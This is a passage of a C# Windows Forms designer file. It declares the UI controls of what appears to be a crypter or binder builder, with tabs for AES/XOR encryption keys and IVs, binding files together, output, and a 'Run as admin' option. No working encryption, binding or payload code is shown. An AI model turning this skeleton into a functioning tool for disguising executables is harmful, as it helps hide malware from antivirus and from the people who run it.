424 | private System.Windows.Forms.TabPage encryptionPage; // "Encryption" tab.
425 | private System.Windows.Forms.CheckBox aesEncryption; // "AES" check box, checked by default; CheckedChanged is wired to aesEncryption_CheckedChanged.
426 | private System.Windows.Forms.CheckBox xorEncryption; // "XOR" check box; CheckedChanged is wired to xorEncryption_CheckedChanged.
427 | private System.Windows.Forms.TabPage binderPage; // "Binder" tab.
428 | private System.Windows.Forms.TabPage outputPage; // "Output" tab.
429 | private System.Windows.Forms.Label label2; // Caption "Keys:" on encryptionPage.
430 | private System.Windows.Forms.TextBox key1; // Read-only text box on encryptionPage, beside the "Keys:" caption.
431 | private System.Windows.Forms.Label label3; // Caption "IVs:" on encryptionPage.
432 | private System.Windows.Forms.Button addFile; // "Add file" button on binderPage; Click is wired to addFile_Click.
433 | private System.Windows.Forms.ListBox listBox1; // List box on binderPage.
434 | private System.Windows.Forms.TextBox iv6; // Read-only text box on encryptionPage.
435 | private System.Windows.Forms.TextBox iv1; // Read-only text box on encryptionPage, beside the "IVs:" caption.
436 | private System.Windows.Forms.TextBox key2; // Read-only text box on encryptionPage.
437 | private System.Windows.Forms.Button refreshKeys; // "Refresh keys" button; Click is wired to UpdateKeys.
438 | private System.Windows.Forms.Button removeFile; // "Remove file" button on binderPage; Click is wired to removeFile_Click.
439 | private System.Windows.Forms.ListBox listBox2; // List box on outputPage.
440 | private System.Windows.Forms.CheckBox runas; // Check box labelled "Run as admin" on optionsPage.
441 | }
442 | }
443 |
--------------------------------------------------------------------------------